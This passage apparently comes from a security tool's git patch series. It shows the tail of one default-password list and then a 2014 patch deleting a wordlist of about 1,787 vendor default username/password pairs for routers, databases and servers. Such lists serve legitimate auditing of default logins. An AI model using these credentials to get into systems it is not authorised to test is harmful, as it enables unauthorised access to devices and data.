+SYSTEM SYSPASS +Guest blank +User User +MDDEMO_CLERK CLERK +FIELD FIELD +Admin SECRET123 +Guest Guest +PHANTOM +admin amigosw1 + xmux +write +ADMINISTRATOR SENTINEL +system field + ducati900ss +qsecofr 22222222 + lkw peter + awkward + TzqF +SYSTEST_CLIG SYSTEST_CLIG +ODS ODS +admin axis2 +BLAKE PAPER +TSDEV TSDEV +PRODBM +admin letmein + joh316 +dos dos +login 0000 +APL2PP +system hdms +admin phplist +god1 12345 +admin novell +CICSUSER CISSUS +22222222 22222222 +root passw0rd +user_publisher demo +OSE$HTTP$ADMIN (random password) +def trade +SuperUser kronites +QS_CBADM QS_CBADM +SYSA SYSA + 00000000 +STUDENT 
STUDENT +Draytek 1234 +SMDR SECONDARY +EREP +VSEMAN + OOOOOOOO +primos_cs prime +demo +fwadmin xceladmin + j64 +MTS_USER MTS_PASSWORD + AWARD_SW +AQDEMO AQDEMO +private ReadWrite access secret + GWrv + MagiMFP + SnuFG5 +IS_$hostname IS_$hostname +HPSupport badg3r5 +ORASSO ORASSO +GATEWAY + t0ch20x +CVIEW +SH SH + zeosx +XXSESS_MGRYY X#1833 + wodj + FOOBAR +SYSMAN SYSMAN +VMMAP +admin urchin +PORTAL30_DEMO PORTAL30_DEMO +Ezsetup +QS_CS QS_CS +administrator PlsChgMe! +CMSUSER + MCUrv +DEMO1 +admin adminadmin +userNotUsed userNotU + AMI~ +root ibm +ncadmin ncadmin +TESTPILOT TESTPILOT + Polrty +fg_sysadmin password +UETP UETP +QS QS +DBI MUMBLEFRATZ +  ILMI +SYSTEM SYS +JWARD AIROPLANE +APPS_MRC APPS_MRC + uboot +Moe hello +SENTINEL SENTINEL +admin netgear1 +Yak asd123 +PDP11 PDP11 + aammii +Flo hello +SLIDE SLIDEPW +root bagabu +primeos primeos + Spacve + 256256 +INFO INFO +checkfsys checkfsys +PRODCICS PRODCICS + foolproof + AWARD_PW +MXAGENT MXAGENT +SYSTEM ORACLE8I +admin no password +VMTLIBR +POWERCARTUSER POWERCARTUSER +VMBACKUP +CPNUC + QDI + shiva +distrib distrib0 +SUPERVISOR SUPERVISOR +SYSMAINT SERVICE +MIGRATE MIGRATE +CDEMOUCB CDEMOUCB +system prime +QSRV 22222222 + c +OLTSEP +sysbin sysbin +signa signa +autocad autocad + SWITCHES_SW +WEBDB WEBDB +daemon + aPAf +ncrm ncrm +SAMPLE SAMPLE + 1 +HCPARK HCPARK +ALLINONE ALLINONE +nm2user nm2user +SAVSYS +IIPS +PATROL PATROL + technolgi + MBIU0 +mailadmin secret +adm adm +TMSADM +tutor tutor +ESubscriber +CHEY_ARCHSVR CHEY_ARCHSVR +write synnet +software software +admin welcome +god2 12345 +bbs bbs + Dell +disttech disttech +FSFTASK2 + zbaaaca + prost +ORDSYS ORDSYS +Administrator administrator + 1234567890 +gopher gopher +PSFMAINT +SYSTEM MANAG3R + RM + s!a@m#n$p%c +EAdmin +12345 12345 +DECNET DECNET +OPERATIONS OPERATIONS +$system +REP_OWNER DEMO +PANAMA PANAMA +LIBRARIAN SHELVES +SYSTEM 0RACLE +fal +4Dgifts 4Dgifts + biosstar +NETSERVER NETSERVER + tiny +root TANDBERG +POWERCHUTE APC +USER5 USER5 +GPFD GPFD 
+ 12345678 +blank admin +QS_OS QS_OS +sysadm admin +REPADMIN REPADMIN +Administrator 12345678 +0 0 +DEMO8 DEMO8 +DEMO9 DEMO9 +CDEMO82 CDEMO82 +admin boca raton +Administrator vision2 +administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? 
+SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM From 7d79f8a4c28a4c0ef0b78db0637a3c055a81cd32 Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 18:15:17 +0200 Subject: [PATCH 335/853] Removed wrongly named list. --- .../default_passwords_large_unhash.txt | 1787 ----------------- 1 file changed, 1787 deletions(-) delete mode 100644 data/wordlists/default_passwords_large_unhash.txt diff --git a/data/wordlists/default_passwords_large_unhash.txt b/data/wordlists/default_passwords_large_unhash.txt deleted file mode 100644 index ff0458f94b..0000000000 --- a/data/wordlists/default_passwords_large_unhash.txt +++ /dev/null 
@@ -1,1787 +0,0 @@ -admin admin - -admin - admin -admin password -admin 1234 -root -Administrator admin -admin epicrouter -sysadm sysadm - 1234 - password - access -root root -tech tech - smcadmin - 0 -Administrator -root pass - system -root admin - PASSWORD - Symbol -operator -guest guest -admin bintec -security security -guest -debug synnet -manager manager - adtran -admin motorola -service smile - cascade -admin 0 -!root -user password - BRIDGE -netman netman -super super -admin switch -admin setup -admin changeme -diag switch -operator operator -user user -user -Cisco Cisco -Manager Manager -DTA TJM -apc apc -tech - cisco -User -root 1234 -Admin - letmein -cablecom router -adm -wradmin trancell - ascend -manager friend - NetICs -root blender -netscreen netscreen - sysadm - SKY_FOX -sa - public - Master -setup setup -root default - laflaf -cmaker cmaker -enable -MICRO RSX -login admin - Posterie -write private -root attack -monitor monitor - private - xdfk9874t3 -netopia netopia - Col2ogro2 -admin microbusiness -op op -adminview OCS -op operator -admin secure -admin atlantis -sysadmin sysadmin -super 5777364 -echo echo -craft -adm cascade -admin default -maint maint -comcast 1234 -CSG SESAME -diag danger -readonly lucenttech2 -admin operator -Manager -debug d.e.b.u.g -admin hello - SYSTEM -root ascend -root calvin -manuf xxyyzz -cusadmin highspeed -admin 123 -smc smcadmin -admin Sharp -root password -sweex mysweex -disttech 4tas -su super -admin system -root changeme -poll tech -sysadmin password -SYSDBA masterkey -anonymous - 0000 -root permit -admin barricade -support support -root tslinux -admin hp.com -recovery recovery -USERID PASSW0RD -eng engineer -administrator administrator -admin pwp -admin isee -NETWORK NETWORK -JDE JDE -admin superuser -Guest - Super -admin admin123 -super surt -rwa rwa -admin 123456 -admin NetCache - ADTRAN -USER USER -test test -admin extendnet -admin ironport -lp lp - Cisco -administrator -admin 1111 -sysadmin PASS -ro ro -admin 
Ascend - _Cisco -MAIL MAIL -ami - sitecom -hsa hsadb -system password -MGR CAROLIAN -ADMINISTRATOR ADMINISTRATOR -admin sysAdmin -root tini -admin smcadmin - Helpdesk -FIELD SERVICE -PBX PBX -netman -HELLO FIELD.SUPPORT -system sys -hscroot abc123 -1502 1502 - star -superuser admin -HELLO MGR.SYS -sysadm anicust -Administrator Administrator -netrangr attack - Intel - 12345 -readwrite lucenttech1 - secret -piranha piranha -wlse wlsedb -admin cisco -l3 l3 -admin diamond -none admin -naadmin naadmin -public public -admin 1988 -admin radius -admin root -NETOP -Administrator letmein -HELLO MANAGER.SYS - raidzone - 3ascotel -MANAGER HPOFFICE -demo demo - 166816 -User Password -admin zoomadsl -D-Link D-Link -user public -user pass -l2 l2 -MGR CCC -rw rw -cgadmin cgadmin -storwatch specialist - secure -vcr NetVCR -OPERATOR COGNOS -piranha q -admin synnet -MDaemon MServer -root cms500 -root davox -jagadmin -enquiry enquirypw -at4400 at4400 -support h179350 -davox davox -admin asd -PFCUser 240653C9467E45 -setup changeme -superuser superuser - atc123 -aaa -root admin_1 - 266344 -MGR WORD -topicalt password -admin2 changeme -1234 1234 -MANAGER ITF3000 - connect -FIELD HPONLY -nms nmspw -client client -admin comcomcom - speedxess -MGR ROBELLE - epicrouter -sys uplink -OPERATOR SYSTEM -field support -MGR SYS -root letacla - FORCE -deskman changeme -MAIL REMOTE -SYSADM sysadm -superadmin secret - backdoor -pmd -MGR CNAS -admin 22222 -GEN2 gen2 - medion -ADMN admn -Factory 56789 -PRODDTA PRODDTA -tellabs tellabs#1 -spcl 0 -dadmin dadmin01 - comcomcom -administrator password -helpdesk OCS -dhs3mt dhs3mt -MGR SECURITY -setup changeme! 
-install llatsni -adfexc adfexc -IntraSwitch Asante -manage !manage -superman 21241036 -MANAGER TELESUP -craft crftpw -login 0 - help -MGR HPOFFICE - lantronix -SPOOLMAN HPOFFICE -manager admin - netadmin -ADVMAIL HP -FIELD SUPPORT -MANAGER SYS -MGR VESOFT -vt100 public -PSEAdmin $secure$ -HELLO OP.OPERATOR -Manager friend - hs7mwxkk -patrol patrol - SUPER - SMDR - 1064 -teacher password -PCUSER SYS -MGR ITF3000 -Any 12345 -OPERATOR DISC -RSBCMON SYS -cellit cellit -MGR INTX3 -inads inads -halt tlah -root wyse -locate locatepw -admin visual -TMAR#HWMT8007079 -rapport r@p8p0r+ -MGR TELESUP -xbox xbox - TENmanUFactOryPOWER -device device -NICONEX NICONEX -admin admin1234 -root fivranne -acc acc -31994 31994 -admin netadmin -bcim bcimpw -websecadm changeme -blue bluepw -topicnorm password -supervisor PlsChgMe - R1QTPS -MGR HPONLY -ccrusr ccrusr -root Cisco -login password -266344 266344 -MAIL MPE -telecom telecom -MAIL HPOFFICE -GEN1 gen1 -Administrator smcadmin -SSA SSA - snmp-Trap -HTTP HTTP - default -mtch mtch -admin adslolitec -Administrator ganteng -bciim bciimpw -browse browsepw -Admin Admin - Password -hydrasna -sys change_on_install -deskres password -bbsd-client changeme2 -anonymous Exabyte -admin rmnetlm -replicator replicator -intel intel -OPERATOR SUPPORT -MGR HPP196 -radware radware -intermec intermec -mlusr mlusr -MGR RJE -FIELD LOTUS -init initpw -e250 e250changeme -MAIL TELESUP -Polycom SpIp -temp1 password - adminttd -tech field -support supportpw -mac - MiniAP -MANAGER SECURITY -3comcso RIP000 -RMUser1 password -WP HPOFFICE -Administrator changeme -MGR XLSERVER -MGR HPP187 -MGR HPP189 -inads indspw -admin linga -craft craft - enter -NAU NAU -rcust rcustpw -admin AitbISP4eCiG -mtcl mtcl -MGR CONV -topicres password -bcnas bcnaspw -MGR NETBASE -admin access -public -adminuser OCS -MGR REGO -Root -cac_admin cacadmin -mediator mediator -superman talent -Anonymous -kermit kermit -admin x-admin -MGR HPDESK - 9999 -root ROOT500 -admin my_DEMARC -volition 
volition -GlobalAdmin GlobalAdmin - 4getme2 -LUCENT01 UI-PSWD-01 -admin 2222 -LUCENT02 UI-PSWD-02 -MANAGER TCH -adminstat OCS -desknorm password -IntraStack Asante -OPERATOR SYS -MGR COGNOS - Fireport - ILMI -maint maintpw -supervisor supervisor -e500 e500changeme -admin mu -MANAGER COGNOS -deskalt password -admin OCS -bbsd-client NULL -cust custpw -admin noway -tiara tiaranet -bcms bcmspw - TANDBERG -m1122 m1122 -telco telco -superuser -xd xd -dhs3pms dhs3pms -VNC winterm -craft craftpw -maint rwmaint -anonymous any@ -login access -browse looker -customer none -cisco cisco -adminstrator changeme -FIELD MANAGER - 1234admin -FIELD MGR -ftp_nmc tuxalize -me -iclock timely -echo User -ADVMAIL HPOFFICE DATA -login 1111 -login 8429 -Administrator manage - Babylon -admin hagpolm1 -root 12345 -scmadmin scmchangeme -user tivonpw -sysadm Admin -Administrator password -admin administrator -installer installer -webadmin webadmin -ftp_inst pbxk1064 -DDIC 19920706 - pento -admin NetSurvibox -SYSTEM D_SYSTPW -draytek 1234 - 3477 -operator $chwarzepumpe -administrator asecret -EARLYWATCH SUPPORT - 10023 -Manager Admin -super.super -ftp_oper help1954 -corecess corecess -superuser 123456 -admin Password -super.super master -admin Protector -SYSTEM MANAGER -webadmin 1234 -install secret -FIELD HPWORD PUB -admin 12345 -admin symbol -weblogic weblogic -Admin 1988 -system/manager sys/change_on_install -root 3ep5w2u - 8111 - jannie -End User 123 -none 0 -d.e.b.u.g User -admin tomcat -target password -Administrator pilou -MD110 help -Administrator 3ware - ANYCOM -tiger tiger123 -adminttd adminttd -admin asante -admin smallbusiness -admin netscreen -FIELD HPP187 SYS -guest User -maint ntacdmax -admin w2402 -wlseuser wlsepassword -SAPCPIC admin -ftp_admi kilo1987 -admin articon -mtcl -default.password -admin michelangelo -manager changeme -root Mau'dib - Serial Num -root ggdaseuaimhrke -7 maintain -2 syslib -ADMIN admin -system weblogic -Administrator ggdaseuaimhrke -ADMIN -itsadmin init 
-PUBSUB PUBSUB -admin demo -system manager -sys sys -CTXSYS CTXSYS -ftp -bill bill -192.168.1.1 60020 @dsl_xilno -FIELD -admin dmr99 -setpriv system -GUEST GUEST -SAP* 06071992 -operator 1234 -t3admin Trintech -hello hello -supervisor -CISCO15 otbu+1 -1.79 Multi - babbit -mso w0rkplac3rul3s -Telecom Telecom -qsysopr qsysopr -admin TANDBERG -admin imss7.0 - nokia -APPS APPS -Developer isdev -mail mail -admin draadloos -qsecofr qsecofr -11111 x-admin - default.password -Service 5678 -enable cisco -netadmin nimdaten -Polycom 456 -admin P@55w0rd! -admin 1234admin -root par0t -any system -db2fenc1 db2fenc1 -johnson control -2 maintain -isp isp -demos -QSRV QSRV -root iDirect -MDSYS MDSYS -Admin 123456 -2 manager -vpasp vpasp -TEST TEST - Telecom -QSECOFR QSECOFR -adm none - 2501 -1 syslib -system security -admin leviton -!root blank -informix informix -root mpegvideo -5 games -root 0P3N -engmode hawk201 -scout scout -qpgmr qpgmr -admin admin000 -ADSL expert03 -cisco -images images -admin security -admin surecom -Gearguy Geardog - symantec -comcast -admin adslroot -1 manager -Demo - xyzzy -Administrator adaptec -system system -SAP* PASS -serial# serial# -BACKUP BACKUP -stratacom stratauser -root rootme -6.x -root !root -webadmin webibm - riverhead -mary password -COMPANY COMPANY -SYS SYS -DSL DSL -Jetform -none amber -eagle eagle -ROUTER -root brightmail -admin pass - HEWITT RAND -ods ods -siteadmin toplayer -admin OkiLAN -root rootpass -Alphanetworks wrgg15_di524 - x40rocks - nokai -Admin1 Admin1 -field field -Admin admin -Admin ImageFolio - iolan - manager -admin pfsense -janta sales janta211 -servlet manager -username password -citel password -Replicator iscopy -SYSMAN OEM_TEMP -1 operator -SYSTEM SYSTEM -administrator RSAAppliance -master themaster01 -Admin 1234 -2 operator -SUPERUSER ANS#150 -admin passwort -cn=orcladmin welcome -30 games -maintainer admin -setup - hello -admin NetSeq -BRIO_ADMIN BRIO_ADMIN - citel -internal oracle -CQSCHEMAUSER PASSWORD -root 
kn1TG7psLu -SYS SYSPASS - lkwpeter -DEV2000_DEMOS DEV2000_DEMOS -FSFTASK1 -checkfs checkfs -BACKUP -USER1 USER1 -root TENmanUFactOryPOWER -SQLDBA -root resumix -HELP HELP -toor logapp -SYS 0RACLE9 -SYS 0RACLE8 - 57gbzb -!root none -qsrvbas qsrvbas -SYSADMIN -EZsetup -Administrator 1234 - sldkj754 -BATCH -STRAT_USER STRAT_PASSWD -Administrator 19750407 - User -user USERP -primenet primeos -OEMREP OEMREP -admin [^_^] -USER6 USER6 -lynx - TTPTHA -powerdown powerdown -root Mau’dib -SYSTEM ORACL3 -$ALOC$ -password -VOL-0215 -admin nimda -tomcat tomcat -REP_MANAGER DEMO -WinCCConnect 2WSXcder -ALLIN1 ALLIN1 -DIRMAINT -eqadmin Serial port only equalizer -sysadm sysadmpw -QSRVBAS QSRVBAS -admin ip305Beheer -debug tech - ACCORD -AQJAVA AQJAVA -LASERWRITER LASERWRITER -Administrator 0000 -root nsi -PERFSTAT PERFSTAT -apcuser apc -MBWATCH MBWATCH - protection -system_admin -unix unix -OWNER OWNER -NETPRIV NETPRIV -VSEMAINT - AWARD?SW -DEMO DEMO -tomcat changethis -SYMPA SYMPA -REP_OWNER REP_OWNER -DCL DCL -FAX -root dbps -ARCHIVIST ARCHIVIST -USER PASSWORD -VTAMUSER -LASERWRITER -VMTAPE -basisk basisk -NetLinx password -OutOfBox demos guest 4DGifts (none by default) -none letmein -NETMGR NETMGR -DEFAULT USER -OAS_PUBLIC OAS_PUBLIC -read -AP AP -demos demos -SYSTEM Admin -admin j5Brn9 -MTSSYS MTSSYS -SYSMAINT DIGITAL -AUDIOUSER AUDIOUSER -Joe hello -IDMS - teX1 -admin allot -$SRV $SRV -snake -SYS 0RACLE -ADVMAIL -Administrator nicecti -ROOT ROOT -PRINTER PRINTER -shutdown -satan - m1link -RDM470 -master access - l2 - l1 -trouble trouble -fax -OP1 -admin@example.com admin -root trendimsa1.0 -HOST HOST -ADLDEMO ADLDEMO -QS_ADM QS_ADM -bin sys - AMI -OPER OPER -oracle -jj -PO7 PO7 -SYSTEM 0RACLE8 -SYSTEM 0RACLE9 -www -joe password - komprie - 123 -MAINT MAINT -CMSBATCH -root toor -CCC -role1 tomcat -DATAMOVE -lp - AMISETUP - sp99dd -halt halt -MSHOME MSHOME -ISPVM -crowd­-openid-­server password -user_editor demo -sedacm secacm -ROOT -Admin 3Com -db2admin db2admin -Airaya Airaya 
-supervisor visor -none Wireless -SYSDUMP1 -IMEDIA IMEDIA - Biostar -install install -primos_cs primos -admin infrant1 -Administrator Partner - Administrative -USER_TEMPLATE USER_TEMPLATE -pnadmin pnadmin - h6BB -lpadmin lpadmin -guest none -VTAM VTAM -TRACESVR TRACE -POSTMASTER POSTMASTER -MAILER MAILER -RSCSV2 -QS_WS QS_WS - sma -system_admin system_admin -circ -Demo password - rwa -nobody nobody -Tasman Tasmannet -admin !admin -DISCOVERER_ADMIN DISCOVERER_ADMIN -VMASMON -LR-ISDN LR-ISDN -TURBINE TURBINE -GL GL -PO PO - AMI_SW -super superpass -PRINT -MODTEST YES -GATEWAY GATEWAY -root system -PRIMARY PRIMARY -both tomcat - award.sw -haasadm lucy99 -pw pwpw -games games -DOCSIS_APP 3Com -bbs -EMP EMP -Admin cclfb -postmaster -SITEMINDER SITEMINDER -Any Any -vgnadmin vgnadmin -RJE RJE -gonzo -NEWS NEWS -sa Ektron - Award -AQUSER AQUSER -UTLBSTATU UTLESTAT - AMIAMI -netbotz netbotz -CTXSYS CHANGE_ON_INSTALL -xmi_demo sap123 - Crystal - Daewuu -ftp ftp -ORACACHE (random password) -MCUser MCUser1 -prash hello -sync -sysadm admpw -root rootadmin -PM PM -AP2SVP -master master -ibm 2222 -ULTIMATE ULTIMATE -SABRE -role1 role1 -user_pricer demo -admin enhydra -SUPERVISOR NF -EVENT EVENT - xyzall - rainbow -ADMIN JETSPEED -SYS ORACL3 -PORTAL30_SSO_PS PORTAL30_SSO_PS -FSFADMIN -OO OO -WKSYS WKSYS -OPERATNS OPERATNS - ksdjfg934t -UVPIM_ - merlin -OE OE -Any Local User Local User password -OCITEST OCITEST -web - HLT -ADMINISTRATOR admin -ESSEX - last -CTXSYS -None xyzzy -CTXDEMO CTXDEMO -user_designer demo - Admin - zebra -QDBA QDBA -role changethis -LRISDN LRISDN -tele tele -WEBCAL01 WEBCAL01 -rsadmin rsadmin -OMWB_EMULATION ORACLE -root alien -WINDOWS_PASSTHRU - sanfran -public ReadOnly access secret - AMIPSWD -MOREAU MOREAU -fast abd234 -root QNX -host dnnhost -administrator root -admin public -SYSTEM ORACLE - sertafu -ORDPLUGINS ORDPLUGINS -SYSWRM -mail - telos -ADMIN ADMIN -administrator adminpass -savelogs crash - ACCESS -SDOS_ICSAP SDOS_ICSAP -system adminpwd -BATCH 
BATCH -GUEST GUESTGUEST -SYSMAINT SYSMAINT -postmaster postmast -DSSYS DSSYS - award_ps - ZAAADA -MGWUSER MGWUSER - NTCIP -OPERATOR - hewlpack -TDOS_ICSAP TDOS_ICSAP -ssp ssp -EJSADMIN EJSADMIN - damin -INGRES INGRES -DS - A.M.I -estheralastruey - 1322222 -VCSRV VCSRV -Administrator storageserver -ssladmin ssladmin -CLARK CLOTH -shutdown shutdown -administrator 1234 -OEMADM OEMADM -restoreonly restoreonly1 -quser quser -PRINTER -MILLER MILLER -trmcnfg trmcnfg -REPORT REPORT -user_author demo - aLLy -dpn changeme -tour tour -mountfsys mountfsys -http -PROG PROG - iwill -openfiler password - Public -admin mp3mystic -RAID hpt -read synnet -admin peribit -STARTER STARTER -FAXUSER -GUEST GUESTGUE -DSA - guardone -daemon daemon -mountsys mountsys -SYSTEM ORACLE9 -SYSTEM ORACLE8 - gandalf -backuponly backuponly1 -IVPM1 - leaves -sysadm syspw -root blablabla - Compleri -USER3 USER3 -OPENSPIRIT OPENSPIRIT - spooml - changeit - wg -prime primeos -HPLASER - Vextrex -CSPUSER -qsvr qsvr -lynx lynx -SYSCKP -root letmein -Sysop Sysop -user_marketer demo -IMAGEUSER IMAGEUSER -root Password -bsxuser bsxpass -MASTER PASSWORD -USER9 USER9 -root ax400 -OLAPSYS MANAGER -SYSTEM OPERATOR -oracle oracle -root Mau?dib - MASTER -root t00lk1t -rsadmin - Daytec -OutOfBox - SZYX - cmaker - CTX_123 -rje rje -ODM_MTR MTRPW -QS_ES QS_ES -lansweeperuser mysecretpassword0* -DEMO3 -Username password -GPLD GPLD -uucp uucp -DBSNMP DBSNMP -VMARCH -GUEST TSEUG -SWUSER SWUSER -root 8RttoTriz -VTAM -OPERATNS -Operator Operator -CHEY_ARCHSVR -SYS ORACLE -roo honey -n.a guardone -accounting accounting -backuprestore backuprestore1 -PRINT PRINT - j322 - Craftr4 -dni dni -WEBADM password -iceman -guru *3noguru -FAX FAX -anon anon - j256 -USER8 USER8 -root honey -PORTAL30_SSO_PUBLIC PORTAL30_SSO_PUBLIC - 589721 -postgres -WINSABRE WINSABRE -USERP USERP -none public -Admin shs -SYS MANAGER -IVPM2 -PORTAL30_SSO PORTAL30_SSO -ALLIN1MAIL ALLIN1MAIL -POST -TEMP - xo11nE -admin nms -SYSADM SYSADM -BATCH1 -me me 
-SUPERVISOR NFI -PROMAIL -SECDEMO SECDEMO -ARAdmin AR#Admin# -sadmin -ORAREGSYS ORAREGSYS -VMASSYS -man -FROSTY SNOWMAN -LASER LASER -tutor - ?award -root changethis -DISKCNT -default WLAN_AP -SYSERR -WWW WWW -VAX VAX -none none - Cable-docsis -PROCAL -SUPERVISOR SYSTEM -FAXWORKS -ibm password -CTXSYS UNKNOWN -LDAP_Anonymous LdapPassword_1 -(any 3 chars) cascade -games -User 1234 - Zenith -setup/snmp setup/nopasswd -DSGATEWAY DSGATEWAY -AWARD_SW -CSMIG CSMIG - year2000 -umountfsys umountfsys - BIGO -root jstwo -VMS VMS -dni -bpel bpel -viewuser viewuser1 -admin ISPMODE -TDISK -politically correct -user_analyst demo -admin conexant -guest 1234 -root logapp -admin ip3000 -RSCS -COMPIERE COMPIERE -OSP22 OSP22 -guest1 guest1 -FORSE FORSE - lesarotl -factory factory -bubba (unknown) -admin ip20 -admin ip21 -LASER -QUSER QUSER - AWARD SW -primeos prime -admin tr650 -poll poll - j262 - xljlbj -glftpd glftpd - Advance -RMAN RMAN -mountfs mountfs -DIRECT - console -firstsite firstsite - SW_AWARD -IPFSERV - snake -Administrator Gateway -TSUSER TSUSER -BATCH2 -admin 123123 - 3098z - cc -snmp nopasswd -WebAdmin WebBoard -IBMUSER SYS1 -SMART -voadmin manager -BC4J BC4J -core phpreactor -OPERVAX OPERVAX -Bobo hello - Congress - central -WANGTEK WANGTEK -disttech etas -OWA OWA -USER2 USER2 -jasperadmin jasperadmin -FIELD DIGITAL -root uClinux -guest guestgue -FAXUSER FAXUSER -WINSABRE SABRE -VMBSYSAD -admin ip400 -PVM -ctb_admin sap123 - AMI.KEY - AMI.KEZ -  ANYCOM -USER_TEMPLATE -DEMO4 - inuvik49 -QSRV 11111111 -qsrv qsrv -superdba admin -PORTAL30 PORTAL31 -PORTAL30 PORTAL30 -XPRT XPRT -Crowd password -User 19750407 -18364 - zjaaadc -ilom-admin ilom-admin -rdc123 rdc123 -sysopr sysopr -tasman tasmannet -SYSTEM 0RACLE8I - Cisco router -admin store - SER -blank blank -ADMIN PASSWORD -admin IP address -WEBREAD WEBREAD -ODM ODM -11111111 11111111 -prime prime -AURORA$ORB$UNAUTHENTICATED INVALID -ADAMS WOOD -root vertex25 -sys bin -lp lineprin -Craft crftpw -www www -postgres dbpass 
-rfmngr $rfmngr$ -sync sync -WANGTEK - 1988 -MAINT -SYSTEST_CLIG SYSTEST -user user0000 -user_approver demo -ilom-operator ilom-operator -Nice-admin nicecti - HELGA-S -answer -NETNONPRIV NETNONPRIV -nuucp -CIDS CIDS -VASTEST -primenet primenet -redline redline - rw -spcl 0000 -admin muze -MBMANAGER MBMANAGER -webmaster -APPLSYS FND - ro -WINDOWS_PASSTHRU WINDOWS_PASSTHRU -USER4 USER4 -hqadmin hqadmin -UOMNI_ -FIELD TEST -sys system -Admin 123qwe -VMUTIL -POST BASE - dn_04rjc -uucpadm uucpadm -halt -FAXWORKS FAXWORKS -admin password1 -EXFSYS EXFSYS -4Dgifts -JMUSER JMUSER -admin imsa7.0 -SUPERVISOR NETFRAME -CIS CIS -UNITY_ - ciscofw -HLW HLW -admin brocade1 -pwrchute pwrchute - setup - Tiny -IDMSSE -postgres svcPASS83 -NSA nsa -!root !ishtar -admin blank -root NeXT -TELEDEMO TELEDEMO - AMIDECOD -recover recover -TRAVEL TRAVEL -lexar - efmukl -viewer -LIBRARY -admin raritan -PO8 PO8 -root@localhost root -NAMES NAMES -secofr secofr -PDMREMI - biostar -MGE VESOFT -USER7 USER7 -OWA_PUBLIC OWA_PUBLIC -questra questra -builtin builtin -SFCNTRL -SAP* 6071992 -boss boss -anonymous password - isolation - Q54arwms -PLEX PLEX -OLAPDBA OLAPDBA - g6PJ -OLAPSVR INSTANCE -user_expert demo -root pixmet2003 -Bhosda Lund -TEST -qsvr ibmcel -CMSBATCH CMSBATCH - ABCD -gropher - AM -administrator admin - condo - Toshiba - familymacintosh -TAHITI TAHITI -NEWINGRES NEWINGRES - AMI?SW - mMmM -man man -VM3812 -root powerapp -ibm service -VIF_DEVELOPER VIF_DEV_PWD -ADMIN WELCOME -Admin Barricade -joeuser joeuser -system isp -IPC -HELPDESK HELPDESK -wlpisystem wlpisystem -TSAFVM -prtgadmin prtgadmin -SYSTEM CHANGE_ON_INSTALL - CONCAT - t0ch88 -webmaster webmaster - djonet -ADMIN changeme -Any - Compaq -UAMIS_ -theman changeit -CISINFO CISINFO -mobile dottie -QS_CB QS_CB -CDEMORID CDEMORID -tech nician -DEMO2 -administrator none -SYS MANAG3R -End User 7936 -PORTAL30_PUBLIC PORTAL30_PUBLIC -sysadmin nortel -SYS D_SYSTPW -SYSTEM SYSPASS -Guest blank -User User -MDDEMO_CLERK CLERK -FIELD FIELD 
-Admin SECRET123 -Guest Guest -PHANTOM -admin amigosw1 - xmux -write -ADMINISTRATOR SENTINEL -system field - ducati900ss -qsecofr 22222222 - lkw peter - awkward - TzqF -SYSTEST_CLIG SYSTEST_CLIG -ODS ODS -admin axis2 -BLAKE PAPER -TSDEV TSDEV -PRODBM -admin letmein - joh316 -dos dos -login 0000 -APL2PP -system hdms -admin phplist -god1 12345 -admin novell -CICSUSER CISSUS -22222222 22222222 -root passw0rd -user_publisher demo -OSE$HTTP$ADMIN (random password) -def trade -SuperUser kronites -QS_CBADM QS_CBADM -SYSA SYSA - 00000000 -STUDENT STUDENT -Draytek 1234 -SMDR SECONDARY -EREP -VSEMAN - OOOOOOOO -primos_cs prime -demo -fwadmin xceladmin - j64 -MTS_USER MTS_PASSWORD - AWARD_SW -AQDEMO AQDEMO -private ReadWrite access secret - GWrv - MagiMFP - SnuFG5 -IS_$hostname IS_$hostname -HPSupport badg3r5 -ORASSO ORASSO -GATEWAY - t0ch20x -CVIEW -SH SH - zeosx -XXSESS_MGRYY 